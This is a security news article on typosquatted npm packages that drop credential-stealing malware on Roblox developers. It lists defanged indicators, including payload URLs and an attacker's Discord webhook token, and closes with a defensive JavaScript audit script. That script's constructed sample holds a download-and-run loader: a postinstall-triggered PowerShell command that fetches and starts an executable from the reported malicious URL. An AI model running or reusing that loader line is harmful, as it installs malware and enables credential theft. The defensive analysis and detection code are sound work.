Researchers discovered five malicious npm packages targeting Roblox developers, spreading malware that steals credentials and personal information.
The packages, autoadv, ro.dll, node-dlls and two versions of rolimons-api, were designed to imitate legitimate modules commonly used by the Roblox developer community.
As of the second quarter of 2024, Roblox, an online platform and game creation system, had 79.5 million daily active users, 58% of them aged 13 or older, and a developer community of 2.6 million contributors.
That popularity makes the platform an appealing target for cybercriminals looking to steal sensitive information or gain unauthorized access to user accounts.
The Attack Mechanism
The threat actor typosquatted the well-known node-dll package, which has been downloaded more than 35,800 times, by publishing a look-alike named node-dlls.
Likewise, the two malicious versions of rolimons-api were designed to mimic Rolimon’s API Module, a tool Roblox developers use to incorporate Rolimon’s data into their games and applications.
Although unofficial wrappers and modules already exist, including the Rolimons Lua module on GitHub and the Rolimons Python package, which has been downloaded over 17,000 times, the malicious rolimons-api packages aimed to exploit developers’ trust in familiar names.
“The malicious packages contained obfuscated code that downloaded and executed Skuld infostealer and Blank Grabber malware,” Socket’s threat research team told Cyber Security News.
Skuld, an infostealer written in Go, harvests sensitive data from Windows systems, targeting Discord, Chromium- and Firefox-based browsers, and cryptocurrency wallets.
Blank Grabber is a Python-based stealer that exfiltrates sensitive data from infected Windows machines.
Its GUI builder lets operators configure the payload’s behaviour, including options to bypass User Account Control (UAC) and disable Windows Defender.
Both stealers deliver the stolen data to the threat actor over Telegram or Discord webhooks.
The malicious npm packages contained obfuscated JavaScript that downloads executables from external sources and runs them.
A function named downloadAndRun fetched the executables and launched them through PowerShell commands.
This let the threat actor run arbitrary code on the victim’s computer without immediately raising suspicion.
Executing the downloaded malware effectively gave the threat actor a backdoor into the victim’s PC.
Deploying the Skuld infostealer and Blank Grabber through that backdoor then began the theft of private information, including banking data, credentials and personal files.
In early 2024 Socket disclosed a similar campaign that used a malicious package mimicking the official noblox.js and noblox.js-server packages.
“The recurring nature of these attacks indicates a persistent threat landscape, with attackers continually seeking to exploit the popularity of the Roblox platform and its developer community’s reliance on open source code,” researchers said.
Vigilance is essential: always double-check package names before installing, review third-party code, and use security tooling designed to flag potentially malicious packages.
Indicators Of Compromise (IOCs)
Malicious Packages:
- autoadv
- ro.dll
- node-dlls
- rolimons-api (two versions)
Malicious URLs:
- hxxps://github[.]com/zvydev/code/raw/main/RobloxPlayerLauncher.exe
- hxxps://github[.]com/zvydev/code/raw/main/cmd.exe
- hxxps://github[.]com/zvydev/code
Discord Webhook:
hxxps://discord[.]com/api/webhooks/1298438839865577564/LcdRm0rKPE01ApFPl9RQHGqhcuExeiqKGpghrB8Lv3iKniiyEa0mVBhFySte_oBx7wyQ
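The script below is an added example, not code from Socket’s report or from the malicious packages themselves. It applies the indicators listed above, plus the download-and-run-via-PowerShell behaviour described in the attack section, to a dependency tree and an install script: it refangs the published URLs, flags the named packages in a package-lock.json (lockfileVersion 2 or 3 layout is assumed), catches names one edit away from an imitated package such as node-dll, and scans install-hook source for loader behaviour. The lockfile, package.json and script text are constructed samples, and the behaviour regexes are the author’s assumptions about what such a loader looks like, not signatures from the campaign.

```javascript
// Added example: audit helpers built from the indicators in this article.
// Everything marked "constructed" is sample data made up for the demo, and the
// behaviour regexes are assumptions, not signatures from the real campaign.

// Defanged IOC URLs exactly as published; refang() turns them into matchable strings.
const DEFANGED_URLS = [
  'hxxps://github[.]com/zvydev/code/raw/main/RobloxPlayerLauncher.exe',
  'hxxps://github[.]com/zvydev/code/raw/main/cmd.exe',
  'hxxps://github[.]com/zvydev/code',
];

// Package names reported as malicious (versions omitted, so any version matches).
const MALICIOUS_PACKAGES = new Set(['autoadv', 'ro.dll', 'node-dlls', 'rolimons-api']);

// Legitimate names the campaigns imitated; used for near-miss (typosquat) checks.
const IMITATED_NAMES = ['node-dll', 'noblox.js', 'noblox.js-server'];

function refang(url) {
  return url.replace(/^hxxp/i, 'http').replace(/\[\.\]/g, '.');
}

// Levenshtein distance: node-dll -> node-dlls is a single insertion.
function editDistance(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Walks the "packages" map of a package-lock.json (lockfileVersion 2/3; assumption)
// and reports exact IOC hits and names one edit away from an imitated package.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === '') continue; // root project entry
    const name = path.split('node_modules/').pop(); // handles nested node_modules
    const reasons = [];
    if (MALICIOUS_PACKAGES.has(name)) reasons.push('known malicious package');
    for (const legit of IMITATED_NAMES) {
      if (name !== legit && editDistance(name, legit) === 1) reasons.push(`one edit from ${legit}`);
    }
    if (reasons.length) findings.push({ name, version: meta.version, reasons });
  }
  return findings;
}

// Heuristics for the download-and-run loader the article describes (assumed patterns).
const BEHAVIOUR_PATTERNS = [
  [/child_process/, 'spawns a child process'],
  [/powershell(\.exe)?\b/i, 'invokes PowerShell'],
  [/Invoke-WebRequest|Start-BitsTransfer|DownloadFile/i, 'PowerShell download cmdlet'],
  [/https?:\/\/(raw\.githubusercontent\.com|github\.com)\/\S+\.exe\b/i, 'downloads a .exe from GitHub'],
  [/\\x[0-9a-f]{2}(\\x[0-9a-f]{2}){3,}/i, 'hex-escaped string (obfuscation)'],
  [/\beval\s*\(|new\s+Function\s*\(/, 'dynamic code evaluation'],
];

// Flags install-time lifecycle hooks in package.json and suspicious behaviour in the hook's source.
function auditInstallScript(pkgJson, source) {
  const findings = [];
  const scripts = pkgJson.scripts || {};
  for (const hook of ['preinstall', 'install', 'postinstall']) {
    if (scripts[hook]) findings.push(`lifecycle hook ${hook}: ${scripts[hook]}`);
  }
  for (const url of DEFANGED_URLS.map(refang)) {
    if (source.includes(url)) findings.push(`known IOC URL: ${url}`);
  }
  for (const [re, why] of BEHAVIOUR_PATTERNS) {
    if (re.test(source)) findings.push(why);
  }
  return findings;
}

// Constructed sample lockfile (versions are placeholders, not the real malicious versions).
const SAMPLE_LOCK = {
  name: 'roblox-tool', lockfileVersion: 3,
  packages: {
    '': { name: 'roblox-tool' },
    'node_modules/lodash': { version: '4.17.21' },
    'node_modules/node-dlls': { version: '0.0.0-sample' },
    'node_modules/rolimons-api': { version: '0.0.0-sample' },
  },
};

// Constructed package.json and install script written in the style the article describes.
const SAMPLE_PACKAGE_JSON = { name: 'node-dlls', version: '0.0.0-sample', scripts: { postinstall: 'node setup.js' } };
const SAMPLE_SOURCE = `
const { exec } = require('child_process');
const _0x = "\\x70\\x6f\\x77\\x65\\x72\\x73\\x68\\x65\\x6c\\x6c";
function downloadAndRun(u) {
  exec(\`powershell -c "Invoke-WebRequest '\${u}' -OutFile x.exe; Start-Process x.exe"\`);
}
downloadAndRun('https://github.com/zvydev/code/raw/main/cmd.exe');
`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(auditLockfile(SAMPLE_LOCK), null, 2));
  console.log(auditInstallScript(SAMPLE_PACKAGE_JSON, SAMPLE_SOURCE));
}
```

Run it with `node audit.js` (any filename) to see node-dlls reported both as a known IOC and as one edit from node-dll, and the sample postinstall script flagged for child-process use, PowerShell invocation, a download cmdlet, a .exe fetched from GitHub and a hex-escaped string. In practice, point auditLockfile at a parsed package-lock.json and auditInstallScript at each dependency's package.json plus the file its install hook runs; the exact-match list catches only these packages, while the edit-distance and behaviour checks are what generalise to the next typosquat.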